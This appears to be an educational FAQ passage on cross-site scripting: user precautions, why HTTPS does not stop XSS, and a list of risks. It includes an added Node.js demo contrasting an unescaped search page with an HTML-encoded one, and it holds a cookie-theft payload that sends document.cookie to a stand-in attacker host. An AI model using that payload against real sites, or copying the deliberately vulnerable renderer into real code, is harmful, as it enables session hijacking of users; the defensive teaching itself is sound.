The simplest protection for a user is to only follow links from the site you actually want to view. If one site links to CNN, for example, do not click that link; go to CNN's own site and use its search engine to find the content. Because a large share of XSS attacks are delivered through a crafted link, this alone removes much of the risk. It does not remove all of it: XSS can also fire automatically when you open an email or email attachment, or read a guestbook or bulletin board post, because the script is stored on the server and runs for every visitor who views it. If you plan on opening an email, or reading a post on a public board from a person you don't know, BE CAREFUL. One of the most effective measures is to turn off JavaScript in your browser settings; in IE, set the security level to High. This blocks script-based attacks such as cookie theft and is in general the safer setting.
"Does encryption protect me?"
Websites that use SSL (https) are no better protected against XSS than websites that are not encrypted. The web application behaves exactly as before; the only difference is that the attack takes place over an encrypted connection. SSL protects data in transit between the browser and the server, but it does nothing about script that the server itself sends to the browser. People often think that because they see the lock on their browser everything is secure. This just isn't the case.
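The point above, as an added example that is not part of the original FAQ: a small Node.js model of a search page that echoes the user's query back into its HTML. The vulnerable version concatenates the query raw, the hardened version HTML-encodes it first, and a crafted link carries a cookie-stealing payload in the query string. The host names (www.example.com, attacker.example) and the payload are constructed for the illustration; the scheme of the link can be http or https without changing what the browser would execute.

```javascript
// Added example, not code from the original FAQ. Models a reflected XSS in a
// search page and shows that TLS (https) does not change the outcome: the
// server emits the same markup over either scheme, and the browser executes
// whatever script that markup contains.

// Constructed attacker payload: loads an image from a hypothetical attacker
// host with the victim's cookies appended (classic cookie theft).
// "attacker.example" is a reserved example domain, not a real host.
const COOKIE_THEFT_PAYLOAD =
  "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>";

// Vulnerable: untrusted input concatenated straight into the HTML.
function renderSearchPageVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Minimal HTML encoder for text placed in an element body or attribute.
// Covers the five characters that change meaning in that context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened: the same page, with the query encoded before insertion.
function renderSearchPageSafe(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Crude stand-in for the browser: does the output contain a <script>
// element the server never wrote itself?
function containsInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// A crafted link a victim might be sent. Only the query string carries the
// attack; the scheme is irrelevant to what the browser runs.
function craftedLink(scheme, payload) {
  return `${scheme}://www.example.com/search?q=${encodeURIComponent(payload)}`;
}

// Recover the query from the link, as the server's framework would.
function queryFromLink(link) {
  return new URL(link).searchParams.get("q");
}

function demo() {
  for (const scheme of ["http", "https"]) {
    const q = queryFromLink(craftedLink(scheme, COOKIE_THEFT_PAYLOAD));
    console.log(
      `${scheme}: vulnerable page runs injected script =`,
      containsInjectedScript(renderSearchPageVulnerable(q)),
      "| hardened page runs injected script =",
      containsInjectedScript(renderSearchPageSafe(q))
    );
  }
}

demo();
```

The two output lines are identical apart from the scheme: the vulnerable page executes the payload over https exactly as it does over http, and the encoded page executes it over neither. Encoding output for the context it lands in is what stops the attack; the transport never sees the difference.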
A few facts about cross-site scripting attacks that you should be aware of:
- Every month roughly 10-25 XSS holes are found in commercial products, and advisories are published explaining the threat.
- XSS attacks are generally invisible to the victim.
- All web servers, application servers, and web application environments are susceptible to cross-site scripting, because the flaw lies in how the application handles user input, not in any one product.
Risks Associated with Cross-Site Scripting
(What kind of damage can XSS cause?)
- User accounts being stolen through session hijacking (stealing cookies) or through the theft of username and password combinations
- The ability for attackers to track your visitors' web browsing behavior, infringing on their privacy
- Abuse of credentials and trust
- Keystroke logging of your site’s visitors
- Misuse of server and bandwidth resources
- The ability for attackers to exploit your visitors' browsers
- Data theft
- Web site defacement and vandalism
- Link injections
- Content theft